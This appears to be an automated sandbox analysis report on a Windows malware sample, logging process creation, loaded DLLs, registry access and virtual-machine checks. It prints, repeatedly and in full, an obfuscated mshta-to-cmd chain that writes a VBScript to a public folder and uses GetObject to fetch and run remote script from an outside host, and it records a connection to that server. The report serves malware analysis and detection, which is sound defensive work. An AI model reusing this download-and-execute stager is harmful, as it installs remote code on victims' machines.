Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo|set /p=^"OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p="OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p="bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\cNOV.vbs"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo|set /p=^"OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbsJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p="OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p="bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbsJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\cNOV.vbs" Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: virtdisk.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: directxdatabasehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: imgutil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cfgmgr32.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: smartscreenps.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: shdocvw.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uianimation.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.system.launcher.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.staterepositorycore.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cfgmgr32.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: virtdisk.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: smartscreenps.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: shdocvw.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: servicingcommon.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appidapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected

Data Obfuscation

barindex
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo|set /p=^"OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p="OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo|set /p=^"OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbsJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p="OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs"Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeCode function: 1_3_0E9B90A7 push esi; ret 1_3_0E9B90B1
Source: C:\Windows\SysWOW64\mshta.exeCode function: 1_3_0E9B90A7 push esi; ret 1_3_0E9B90B1
Source: C:\Windows\SysWOW64\wscript.exeCode function: 28_2_061DEAD7 push eax; retf 28_2_061DEB05
Source: C:\Windows\SysWOW64\wscript.exeCode function: 28_2_061DD2F9 push es; ret 28_2_061DD308
Source: C:\Windows\SysWOW64\wscript.exeCode function: 28_2_061DE560 push ds; retf 28_2_061DE56E

Persistence and Installation Behavior

barindex
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\Public\cNOV.vbsJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey value created or modified: HKEY_LOCAL_MACHINE\SYSTEM\Software\Microsoft\TIP\AggregateResults dataJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: wscript.exe, 0000001C.00000002.12458618150.0000000003023000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001C.00000003.12457719526.0000000003022000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-VFOHF
Source: mshta.exe, 00000001.00000003.12567033771.0000000002ED1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496435383.0000000002ED0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12570297373.0000000002ED1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW;
Source: wscript.exe, 0000001C.00000003.12457719526.0000000003022000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .VMware Virtual PlatformKIF
Source: wscript.exe, 0000001C.00000002.12458618150.0000000002FF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V 2008 R2XGQXGQXGQ
Source: wscript.exe, 0000001C.00000003.12457719526.0000000003022000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareOIGHS
Source: mshta.exe, 00000001.00000003.12567033771.0000000002ED1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496435383.0000000002ED0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12570297373.0000000002ED1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001C.00000002.12458618150.0000000002FB5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: mshta.exe, 00000001.00000003.12508874148.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12505060400.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573384336.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556795217.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541089145.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12558604615.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492287014.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510880698.000000000720C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001C.00000002.12458618150.0000000003010000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWf
Source: wscript.exe, 0000001C.00000002.12458618150.0000000002FE1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
Source: wscript.exe, 0000001C.00000002.12458618150.0000000002FF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0Hyper-V 2008 Beta or RC0PFV
Source: wscript.exe, 0000001C.00000002.12458618150.0000000003023000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001C.00000003.12457719526.0000000003022000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V 2008 RTMHOHHOHH6
Source: C:\Windows\SysWOW64\mshta.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 92.205.57.102 443Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo|set /p=^"OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbsJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo"Jump to behavior
